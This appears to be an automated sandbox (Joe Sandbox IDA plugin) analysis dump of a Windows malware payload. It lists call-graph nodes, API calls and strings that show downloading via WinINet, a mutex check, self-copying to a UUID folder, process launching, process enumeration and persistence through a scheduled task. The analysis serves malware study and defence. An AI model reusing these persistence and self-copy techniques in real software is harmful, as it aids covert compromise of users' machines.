38888->38882 39220 4bf1bb 59 API calls 3 library calls 38888->39220 38892 488437 38891->38892 38896 488446 38891->38896 38892->38896 39221 485d50 59 API calls ___check_float_string 38892->39221 38893 4884b9 38893->38536 38896->38893 39222 488d50 59 API calls 38896->39222 39223 4a1781 38897->39223 39241 49f7c0 38900->39241 38903 481d20 _memset 38904 481d40 RegQueryValueExW RegCloseKey 38903->38904 38905 481d8f 38904->38905 38905->38905 38906 485c10 59 API calls 38905->38906 38907 481dbf 38906->38907 38908 481e7c 38907->38908 38909 481dd1 lstrlenA 38907->38909 38911 481e94 6 API calls 38908->38911 39243 483520 59 API calls 38909->39243 38913 481ef5 UuidCreate UuidToStringW 38911->38913 38912 481df1 38914 481e3c PathFileExistsW 38912->38914 38917 481e00 38912->38917 38915 481f36 38913->38915 38914->38908 38916 481e52 38914->38916 38919 485c10 59 API calls 38915->38919 38918 481e6a 38916->38918 38921 484690 59 API calls 38916->38921 38917->38912 38917->38914 38928 4821d1 38918->38928 38920 481f59 RpcStringFreeW PathAppendW CreateDirectoryW 38919->38920 38922 481fce 38920->38922 38923 481f98 38920->38923 38921->38918 38924 485c10 59 API calls 38922->38924 38925 485c10 59 API calls 38923->38925 38926 48201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 38924->38926 38925->38922 38927 48207c _memset 38926->38927 38926->38928 38929 482095 6 API calls 38927->38929 38928->38571 38930 482109 38929->38930 38931 482115 _memset 38929->38931 39244 483260 59 API calls 38930->39244 38933 482125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 38931->38933 38934 4821aa GetLastError 38933->38934 38935 4821b2 38933->38935 38934->38928 38936 4821c0 WaitForSingleObject 38935->38936 38936->38928 38936->38936 38938 49f7c0 __ftell_nolock 38937->38938 38939 48222d 7 API calls 38938->38939 38940 48228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 38939->38940 38941 4822bd K32EnumProcesses 38939->38941 38940->38941 38942 4822df 38941->38942 38943 4822d3 38941->38943 38944 482353 38942->38944 38945 4822f0 OpenProcess 38942->38945 38943->38542 38944->38542 38946 48230a K32EnumProcessModules 38945->38946 38947 482346 CloseHandle 38945->38947 38946->38947 38948 48231c K32GetModuleBaseNameW 38946->38948 38947->38944 38947->38945 39245 490235 38948->39245 38950 48233e 38950->38947 38951 482345 38950->38951 38951->38947 38953 490c62 _malloc 58 API calls 38952->38953 38956 47ef6e _memset 38953->38956 38954 47efdc 38954->38548 38955 490c62 _malloc 58 API calls 38955->38956 38956->38954 38956->38955 38956->38956 38958 483f05 38957->38958 38964 483eae 38957->38964 38959 483f18 38958->38959 38960 483fb1 38958->38960 38962 483fbb 38959->38962 38963 483f2d 38959->38963 38967 483f3d ___check_float_string 38959->38967 39261 4bf23e 59 API calls 2 library calls 38960->39261 39262 4bf23e 59 API calls 2 library calls 38962->39262 38963->38967 39260 486760 59 API calls 2 library calls 38963->39260 38964->38958 38970 483ed4 38964->38970 38967->38548 38972 483ed9 38970->38972 38973 483eef 38970->38973 39258 483da0 59 API calls ___check_float_string 38972->39258 39259 483da0 59 API calls ___check_float_string 38973->39259 38976 483eff 38976->38548 38977 483ee9 38977->38548 38979 4846a9 38978->38979 38980 48478c 38978->38980 38982 4846e9 38979->38982 38983 4846b6 38979->38983 39265 4bf26c 59 API calls 3 library calls 38980->39265 38986 4847a0 38982->38986 38987 4846f5 38982->38987 38984 484796 38983->38984 38985 4846c2 38983->38985 39266 4bf26c 59 API calls 3 library calls 38984->39266 39263 483340 59 API calls _memmove 38985->39263 39267 4bf23e 59 API calls 2 library calls 38986->39267 38997 484707 ___check_float_string 38987->38997 39264 486950 59 API calls 2 library calls 38987->39264 38996 4846e0 38996->38564 38997->38564 39002 47d27d CoInitializeSecurity 39001->39002 39008 47d276 39001->39008 39003 484690 59 API calls 39002->39003 39004 47d2b8 CoCreateInstance 39003->39004 39005 47d2e3 VariantInit VariantInit VariantInit VariantInit 39004->39005 39006 47da3c CoUninitialize 39004->39006 39007 47d38e VariantClear VariantClear VariantClear VariantClear 39005->39007 39006->39008 39009 47d3e2 39007->39009 39010 47d3cc CoUninitialize 39007->39010 39008->38588 39268 47b140 39009->39268 39010->39008 39013 47d3f6 39273 47b1d0 39013->39273 39015 47d422 39016 47d426 CoUninitialize 39015->39016 39017 47d43c 39015->39017 39016->39008 39018 47b140 60 API calls 39017->39018 39020 47d449 39018->39020 39021 47b1d0 SysFreeString 39020->39021 39022 47d471 39021->39022 39023 47d496 CoUninitialize 39022->39023 39024 47d4ac 39022->39024 39023->39008 39026 47b140 60 API calls 39024->39026 39069 47d8cf 39024->39069 39027 47d4d5 39026->39027 39028 47b1d0 SysFreeString 39027->39028 39029 47d4fd 39028->39029 39030 47b140 60 API calls 39029->39030 39029->39069 39031 47d5ae 39030->39031 39032 47b1d0 SysFreeString 39031->39032 39033 47d5d6 39032->39033 39034 47b140 60 API calls 39033->39034 39033->39069 39035 47d679 39034->39035 39036 47b1d0 SysFreeString 39035->39036 39037 47d6a1 39036->39037 39038 47b140 60 API calls 39037->39038 39037->39069 39039 47d6b6 39038->39039 39040 47b1d0 SysFreeString 39039->39040 39041 47d6de 39040->39041 39042 47b140 60 API calls 39041->39042 39041->39069 39043 47d707 39042->39043 39044 47b1d0 SysFreeString 39043->39044 39045 47d72f 39044->39045 39046 47b140 60 API calls 39045->39046 39045->39069 39047 47d744 39046->39047 39048 47b1d0 SysFreeString 39047->39048 39049 47d76c 39048->39049 39049->39069 39277 493aaf GetSystemTimeAsFileTime 39049->39277 39051 47d77d 39279 493551 39051->39279 39056 482c40 59 API calls 39057 47d7b5 39056->39057 39058 482900 60 API calls 39057->39058 39059 47d7c3 39058->39059 39060 47b140 60 API calls 39059->39060 39061 47d7db 39060->39061 39062 47b1d0 SysFreeString 39061->39062 39063 47d7ff 39062->39063 39064 47b140 60 API calls 39063->39064 39063->39069 39065 47d8a3 39064->39065 39066 47b1d0 SysFreeString 39065->39066 39067 47d8cb 39066->39067 39068 47b140 60 API calls 39067->39068 39067->39069 39070 47d8ea 39068->39070 39069->39006 39071 47b1d0 SysFreeString 39070->39071 39072 47d912 39071->39072 39072->39069 39287 47b400 SysAllocString 39072->39287 39074 47d936 VariantInit VariantInit 39075 47b140 60 API calls 39074->39075 39076 47d985 39075->39076 39077 47b1d0 SysFreeString 39076->39077 39078 47d9e7 VariantClear VariantClear VariantClear 39077->39078 39079 47da46 CoUninitialize 39078->39079 39080 47da10 39078->39080 39079->39008 39291 49052a 78 API calls vswprintf 39080->39291 39083->38520 39084->38562 39085->38563 39086->38601 39087->38605 39089 485c66 39088->39089 39095 485c1e 39088->39095 39090 485cff 39089->39090 39091 485c76 39089->39091 39448 4bf23e 59 API calls 2 library calls 39090->39448 39092 485c88 ___check_float_string 39091->39092 39447 486950 59 API calls 2 library calls 39091->39447 39092->38609 39095->39089 39100 485c45 39095->39100 39101 484690 59 API calls 39100->39101 39102 485c60 39101->39102 39102->38609 39103->38611 39104->38614 39105->38620 39106->38630 39108 483a90 59 API calls 39107->39108 39109 48294c MultiByteToWideChar 39108->39109 39110 488400 59 API calls 39109->39110 39111 48298d 39110->39111 39111->38633 39112->38638 39113->38646 39114->38652 39115->38656 39116->38660 39117->38664 39118->38668 39119->38672 39120->38676 39121->38678 39122->38680 39123->38682 39124->38684 39125->38686 39126->38688 39127->38690 39128->38692 39129->38694 39130->38696 39131->38698 39132->38700 39133->38702 39134->38704 39135->38706 39136->38708 39138 482c5f 39137->39138 39139 482c71 39137->39139 39140 4856d0 59 API calls 39138->39140 39142 4856d0 59 API calls 39139->39142 39141 482c6a 39140->39141 39141->38713 39143 482c8a 39142->39143 39143->38713 39144->38715 39145->38738 39146->38738 39147->38738 39148->38719 39149->38721 39150->38724 39151->38726 39152->38730 39153->38732 39154->38735 39155->38740 39156->38742 39157->38766 39158->38766 39159->38766 39160->38766 39161->38766 39162->38766 39449 48f130 218 API calls _LangCountryEnumProc@4 39162->39449 39163->38746 39450 48fd80 64 API calls 39163->39450 39167 4856de 39166->39167 39168 485735 39166->39168 39167->39168 39177 485704 39167->39177 39169 4857bc 39168->39169 39170 48573e 39168->39170 39190 4bf23e 59 API calls 2 library calls 39169->39190 39175 485750 ___check_float_string 39170->39175 39189 486760 59 API calls 2 library calls 39170->39189 39175->38868 39179 485709 39177->39179 39180 48571f 39177->39180 39187 483ff0 59 API calls ___check_float_string 39179->39187 39188 483ff0 59 API calls ___check_float_string 39180->39188 39183 485719 39183->38868 39184 48572f 39184->38868 39185->38871 39186->38866 39187->39183 39188->39184 39189->39175 39197 493b4c 39191->39197 39193 48ccca 39195 48a00a 39193->39195 39207 4bf1bb 59 API calls 3 library calls 39193->39207 39195->38523 39195->38524 39200 493b54 39197->39200 39198 490c62 _malloc 58 API calls 39198->39200 39199 493b6e 39199->39193 39200->39198 39200->39199 39202 493b72 std::exception::exception 39200->39202 39208 49793d DecodePointer 39200->39208 39209 4a0eca RaiseException 39202->39209 39204 493b9c 39210 4a0d91 58 API calls _free 39204->39210 39206 493bae 39206->39193 39208->39200 39209->39204 39210->39206 39212 493b4c 59 API calls 39211->39212 39213 48cc5d 39212->39213 39214 48cc64 39213->39214 39218 4bf1bb 59 API calls 3 library calls 39213->39218 39214->38879 39217 48d740 59 API calls 39214->39217 39217->38879 39221->38896 39222->38896 39226 4a1570 39223->39226 39227 4a1580 39226->39227 39228 4a1586 39227->39228 39233 4a15ae 39227->39233 39237 495208 58 API calls __getptd_noexit 39228->39237 39230 4a158b 39238 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 39230->39238 39235 4a15cf wcstoxq 39233->39235 39239 49e883 GetStringTypeW 39233->39239 39234 48a36e lstrcpyW lstrcpyW 39234->38557 39235->39234 39240 495208 58 API calls __getptd_noexit 39235->39240 39237->39230 39238->39234 39239->39233 39240->39234 39242 481cf2 RegOpenKeyExW 39241->39242 39242->38903 39242->38928 39243->38912 39244->38931 39246 490241 39245->39246 39247 4902b6 39245->39247 39254 490266 39246->39254 39255 495208 58 API calls __getptd_noexit 39246->39255 39257 4902c8 60 API calls 3 library calls 39247->39257 39250 4902c3 39250->38950 39251 49024d 39256 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 39251->39256 39253 490258 39253->38950 39254->38950 39255->39251 39256->39253 39257->39250 39258->38977 39259->38976 39260->38967 39263->38996 39264->38997 39265->38984 39266->38986 39269 493b4c 59 API calls 39268->39269 39270 47b164 39269->39270 39271 47b177 SysAllocString 39270->39271 39272 47b194 39270->39272 39271->39272 39272->39013 39274 47b1de 39273->39274 39276 47b202 39273->39276 39275 47b1f5 SysFreeString 39274->39275 39274->39276 39275->39276 39276->39015 39278 493add __aulldiv 39277->39278 39278->39051 39292 4a035d 39279->39292 39281 49355a 39282 47d78f 39281->39282 39300 493576 39281->39300 39284 4928e0 39282->39284 39402 49279f 39284->39402 39288 47b423 39287->39288 39289 47b41d 39287->39289 39290 47b42d VariantClear 39288->39290 39289->39074 39290->39074 39291->39069 39333 49501f 58 API calls 4 library calls 39292->39333 39294 4a0363 39295 4a0369 39294->39295 39297 4a038d 39294->39297 39299 498cde __malloc_crt 58 API calls 39294->39299 39295->39297 39334 495208 58 API calls __getptd_noexit 39295->39334 39297->39281 39298 4a036e 39298->39281 39299->39295 39301 4935a9 _memset 39300->39301 39302 493591 39300->39302 39301->39302 39309 4935c0 39301->39309 39343 495208 58 API calls __getptd_noexit 39302->39343 39304 493596 39344 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 39304->39344 39306 4935e9 39335 49fb64 39306->39335 39307 4935cb 39345 495208 58 API calls __getptd_noexit 39307->39345 39309->39306 39309->39307 39311 4935ee 39346 49f803 58 API calls __Strftime_l 39311->39346 39313 4935f7 39314 4937e5 39313->39314 39347 49f82d 58 API calls __Strftime_l 39313->39347 39360 4942fd 8 API calls 2 library calls 39314->39360 39317 4937ef 39318 493609 39318->39314 39348 49f857 39318->39348 39320 49361b 39320->39314 39321 493624 39320->39321 39322 49369b 39321->39322 39323 493637 39321->39323 39358 49f939 58 API calls 4 library calls 39322->39358 39355 49f939 58 API calls 4 library calls 39323->39355 39325 4936a2 39332 4935a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 39325->39332 39359 49fbb4 58 API calls 4 library calls 39325->39359 39327 49364f 39327->39332 39356 49fbb4 58 API calls 4 library calls 39327->39356 39330 493668 39330->39332 39357 49f939 58 API calls 4 library calls 39330->39357 39332->39282 39333->39294 39334->39298 39336 49fb70 _vwprintf_helper 39335->39336 39337 498af7 __lock 58 API calls 39336->39337 39338 49fba5 _vwprintf_helper 39336->39338 39339 49fb80 39337->39339 39338->39311 39340 49fb93 39339->39340 39361 49fe47 39339->39361 39390 49fbab LeaveCriticalSection _doexit 39340->39390 39343->39304 39344->39332 39345->39332 39346->39313 39347->39318 39349 49f861 39348->39349 39350 49f876 39348->39350 39400 495208 58 API calls __getptd_noexit 39349->39400 39350->39320 39352 49f866 39401 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 39352->39401 39354 49f871 39354->39320 39355->39327 39356->39330 39357->39332 39358->39325 39359->39332 39360->39317 39362 49fe53 _vwprintf_helper 39361->39362 39363 498af7 __lock 58 API calls 39362->39363 39364 49fe71 _W_expandtime 39363->39364 39365 49f857 __tzset_nolock 58 API calls 39364->39365 39366 49fe86 39365->39366 39380 49ff25 __tzset_nolock __isindst_nolock 39366->39380 39391 49f803 58 API calls __Strftime_l 39366->39391 39369 49fe98 39369->39380 39392 49f82d 58 API calls __Strftime_l 39369->39392 39370 49ff71 GetTimeZoneInformation 39370->39380 39373 49feaa 39373->39380 39393 4a3f99 58 API calls 2 library calls 39373->39393 39375 49ffd8 WideCharToMultiByte 39375->39380 39376 49feb8 39394 4b1667 78 API calls 3 library calls 39376->39394 39378 4a0010 WideCharToMultiByte 39378->39380 39380->39370 39380->39375 39380->39378 39381 4a0157 __tzset_nolock _vwprintf_helper __isindst_nolock 39380->39381 39383 4aff8e 58 API calls __tzset_nolock 39380->39383 39389 493c2d 61 API calls UnDecorator::getZName 39380->39389 39397 4942fd 8 API calls 2 library calls 39380->39397 39398 490bed 58 API calls 2 library calls 39380->39398 39399 4a00d7 LeaveCriticalSection _doexit 39380->39399 39381->39340 39382 49ff0c _strlen 39384 498cde __malloc_crt 58 API calls 39382->39384 39383->39380 39387 49ff1a _strlen 39384->39387 39385 49fed9 _is_exception_typeof 39385->39380 39385->39382 39395 490bed 58 API calls 2 library calls 39385->39395 39387->39380 39396 49c0fd 58 API calls __Strftime_l 39387->39396 39389->39380 39390->39338 39391->39369 39392->39373 39393->39376 39394->39385 39395->39382 39396->39380 39397->39380 39398->39380 39399->39380 39400->39352 39401->39354 39429 49019c 39402->39429 39405 4927d4 39437 495208 58 API calls __getptd_noexit 39405->39437 39407 4927d9 39438 4942d2 9 API calls __invalid_parameter_noinfo_noreturn 39407->39438 39408 4927e9 MultiByteToWideChar 39411 492815 39408->39411 39412 492804 GetLastError 39408->39412 39410 47d7a3 39410->39056 39414 498cde __malloc_crt 58 API calls 39411->39414 39439 4951e7 58 API calls 3 library calls 39412->39439 39415 49281d 39414->39415 39416 492825 MultiByteToWideChar 39415->39416 39428 492810 39415->39428 39416->39412 39417 49283f 39416->39417 39419 498cde __malloc_crt 58 API calls 39417->39419 39421 49284a 39419->39421 39420 4928a0 39443 490bed 58 API calls 2 library calls 39420->39443 39421->39428 39440 49d51e 88 API calls 3 library calls 39421->39440 39424 492866 39425 49286f WideCharToMultiByte 39424->39425 39424->39428 39426 49288b GetLastError 39425->39426 39425->39428 39441 4951e7 58 API calls 3 library calls 39426->39441 39442 490bed 58 API calls 2 library calls 39428->39442 39430 4901ad 39429->39430 39434 4901fa 39429->39434 39444 495007 58 API calls 2 library calls 39430->39444 39432 4901b3 39433 4901da 39432->39433 39445 4945dc 58 API calls 6 library calls 39432->39445 39433->39434 39446 49495e 58 API calls 6 library calls 39433->39446 39434->39405 39434->39408 39437->39407 39438->39410 39439->39428 39440->39424 39441->39428 39442->39420 39443->39410 39444->39432 39445->39433 39446->39434 39447->39092 39454 497e1a _vwprintf_helper 39453->39454 39455 498af7 __lock 51 API calls 39454->39455 39456 497e21 39455->39456 39457 497e4f DecodePointer 39456->39457 39459 497eda __cinit 39456->39459 39457->39459 39460 497e66 DecodePointer 39457->39460 39473 497f28 39459->39473 39466 497e76 39460->39466 39462 497f37 _vwprintf_helper 39462->38769 39464 497e83 EncodePointer 39464->39466 39465 497f1f 39467 497b0b __lockerr_exit 3 API calls 39465->39467 39466->39459 39466->39464 39468 497e93 DecodePointer EncodePointer 39466->39468 39469 497f28 39467->39469 39471 497ea5 DecodePointer DecodePointer 39468->39471 39470 497f35 39469->39470 39478 498c81 LeaveCriticalSection 39469->39478 39470->38769 39471->39466 39474 497f2e 39473->39474 39475 497f08 39473->39475 39479 498c81 LeaveCriticalSection 39474->39479 39475->39462 39477 498c81 LeaveCriticalSection 39475->39477 39477->39465 39478->39470 39479->39475 39480 4940f6 39481 4940b0 39480->39481 39482 49403b 39481->39482 39483 4940b2 39481->39483 39488 4a21a1 __wsetenvp 58 API calls 39482->39488 39484 494090 39483->39484 39485 4940b4 39483->39485 39504 497c59 58 API calls _doexit 39484->39504 39487 4940c0 39485->39487 39505 497cec 58 API calls _doexit 39485->39505 39506 497c4a 58 API calls _doexit 39487->39506 39491 49404f 39488->39491 39492 49405a 39491->39492 39502 497c2e 58 API calls 3 library calls 39491->39502 39494 497c68 __cinit 68 API calls 39492->39494 39495 494062 39494->39495 39497 49406d __wwincmdln 39495->39497 39503 497c2e 58 API calls 3 library calls 39495->39503 39496 494095 _vwprintf_helper 39499 489f90 586 API calls 39497->39499 39500 494081 39499->39500 39500->39484 39501 497f3d 58 API calls 39500->39501 39501->39484 39504->39496 39505->39487 39506->39496
                                                                                                  APIs
                                                                                                    • Part of subcall function 0047CF10: _memset.LIBCMT ref: 0047CF4A
                                                                                                    • Part of subcall function 0047CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0047CF5F
                                                                                                    • Part of subcall function 0047CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0047CFA6
                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00489FC4
                                                                                                  • GetLastError.KERNEL32 ref: 00489FD2
                                                                                                  • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00489FDA
                                                                                                  • GetLastError.KERNEL32 ref: 00489FE4
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,008B30F8,?), ref: 0048A0BB
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0048A0C2
                                                                                                  • GetCommandLineW.KERNEL32(?,?), ref: 0048A161
                                                                                                    • Part of subcall function 004824E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004824FE
                                                                                                    • Part of subcall function 004824E0: GetLastError.KERNEL32 ref: 00482509
                                                                                                    • Part of subcall function 004824E0: CloseHandle.KERNEL32 ref: 0048251C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                  • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1W$list<T> too long$x*W$x2X${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7W
                                                                                                  • API String ID: 2957410896-150821116
                                                                                                  • Opcode ID: adfdfd7f164778e6c2276708d1ba5fad6d4c09926aae35576b67ea91b9b4fe79
                                                                                                  • Instruction ID: 7c77ac030df5990d22bab2936d870a768b18eed89333484258f6b1a69eea9d5c
                                                                                                  • Opcode Fuzzy Hash: adfdfd7f164778e6c2276708d1ba5fad6d4c09926aae35576b67ea91b9b4fe79
                                                                                                  • Instruction Fuzzy Hash: 92D2D370504341ABDB14FF24C845B9F7BE4BF94708F004D2EF48597292EBB9A909DB9A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 688 47d240-47d274 CoInitialize 689 47d276-47d278 688->689 690 47d27d-47d2dd CoInitializeSecurity call 484690 CoCreateInstance 688->690 691 47da8e-47da92 689->691 697 47d2e3-47d3ca VariantInit * 4 VariantClear * 4 690->697 698 47da3c-47da44 CoUninitialize 690->698 694 47da94-47da9c call 492587 691->694 695 47da9f-47dab1 691->695 694->695 704 47d3e2-47d3fe call 47b140 697->704 705 47d3cc-47d3dd CoUninitialize 697->705 700 47da69-47da6d 698->700 702 47da6f-47da77 call 492587 700->702 703 47da7a-47da8a 700->703 702->703 703->691 711 47d404 704->711 712 47d400-47d402 704->712 705->700 713 47d406-47d424 call 47b1d0 711->713 712->713 717 47d426-47d437 CoUninitialize 713->717 718 47d43c-47d451 call 47b140 713->718 717->700 722 47d457 718->722 723 47d453-47d455 718->723 724 47d459-47d494 call 47b1d0 722->724 723->724 730 47d496-47d4a7 CoUninitialize 724->730 731 47d4ac-47d4c2 724->731 730->700 734 47da2a-47da37 731->734 735 47d4c8-47d4dd call 47b140 731->735 734->698 739 47d4e3 735->739 740 47d4df-47d4e1 735->740 741 47d4e5-47d508 call 47b1d0 739->741 740->741 741->734 746 47d50e-47d524 741->746 746->734 748 47d52a-47d542 746->748 748->734 751 47d548-47d55e 748->751 751->734 753 47d564-47d57c 751->753 753->734 756 47d582-47d59b 753->756 756->734 758 47d5a1-47d5b6 call 47b140 756->758 761 47d5bc 758->761 762 47d5b8-47d5ba 758->762 763 47d5be-47d5e1 call 47b1d0 761->763 762->763 763->734 768 47d5e7-47d5fd 763->768 768->734 770 47d603-47d626 768->770 770->734 773 47d62c-47d651 770->773 773->734 776 47d657-47d666 773->776 776->734 778 47d66c-47d681 call 47b140 776->778 781 47d687 778->781 782 47d683-47d685 778->782 783 47d689-47d6a3 call 47b1d0 781->783 782->783 783->734 787 47d6a9-47d6be call 47b140 783->787 790 47d6c4 787->790 791 47d6c0-47d6c2 787->791 792 47d6c6-47d6e0 call 47b1d0 790->792 791->792 792->734 796 47d6e6-47d6f4 792->796 796->734 798 47d6fa-47d70f call 47b140 796->798 801 47d715 798->801 802 47d711-47d713 798->802 803 47d717-47d731 call 47b1d0 801->803 802->803 803->734 807 47d737-47d74c call 47b140 803->807 810 47d752 807->810 811 47d74e-47d750 807->811 812 47d754-47d76e call 47b1d0 810->812 811->812 812->734 816 47d774-47d7ce call 493aaf call 493551 call 4928e0 call 482c40 call 482900 812->816 827 47d7d2-47d7e3 call 47b140 816->827 828 47d7d0 816->828 831 47d7e5-47d7e7 827->831 832 47d7e9 827->832 828->827 833 47d7eb-47d819 call 47b1d0 call 483210 831->833 832->833 833->734 840 47d81f-47d835 833->840 840->734 842 47d83b-47d85e 840->842 842->734 845 47d864-47d889 842->845 845->734 848 47d88f-47d8ab call 47b140 845->848 851 47d8b1 848->851 852 47d8ad-47d8af 848->852 853 47d8b3-47d8cd call 47b1d0 851->853 852->853 857 47d8cf-47d8d8 853->857 858 47d8dd-47d8f2 call 47b140 853->858 857->734 862 47d8f4-47d8f6 858->862 863 47d8f8 858->863 864 47d8fa-47d91d call 47b1d0 862->864 863->864 864->734 869 47d923-47d98d call 47b400 VariantInit * 2 call 47b140 864->869 874 47d993 869->874 875 47d98f-47d991 869->875 876 47d995-47da0e call 47b1d0 VariantClear * 3 874->876 875->876 880 47da46-47da67 CoUninitialize 876->880 881 47da10-47da27 call 49052a 876->881 880->700 881->734
                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 0047D26C
                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0047D28F
                                                                                                  • CoCreateInstance.OLE32(0054506C,00000000,00000001,00544FEC,?,?,00000000,000000FF), ref: 0047D2D5
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0047D2F0
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0047D309
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0047D322
                                                                                                  • VariantInit.OLEAUT32(?), ref: 0047D33B
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047D397
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047D3A4
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047D3B1
                                                                                                  • VariantClear.OLEAUT32(?), ref: 0047D3C2
                                                                                                  • CoUninitialize.OLE32 ref: 0047D3D5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1692051848.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1692037021.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692121148.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692156484.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692177935.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692196126.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1692239824.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                  • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                  • API String ID: 2496729271-1738591096
                                                                                                  • Opcode ID: 81e306f1c775158c3dd3a336ede1ff770835a6233fe483c97581e25efc281e7a
                                                                                                  • Instruction ID: fc31322816b200f66bb34dc897b2630b55f443b5e6af9b04521bc33d8b381c41
                                                                                                  • Opcode Fuzzy Hash: 81e306f1c775158c3dd3a336ede1ff770835a6233fe483c97581e25efc281e7a
                                                                                                  • Instruction Fuzzy Hash: EF526C70E00219DFDB10DFA5C848BEEBBB4FF49314F148199E509AB251DB34AE46CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCommandLineW.KERNEL32 ref: 00482235
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 00482240
                                                                                                  • PathFindFileNameW.SHLWAPI(00000000), ref: 00482248
                                                                                                  • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00482256
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0048226A
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00482275
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00482280
                                                                                                  • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00482291
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0048229F
                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004822AA
                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004822B5
                                                                                                  • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004822CD
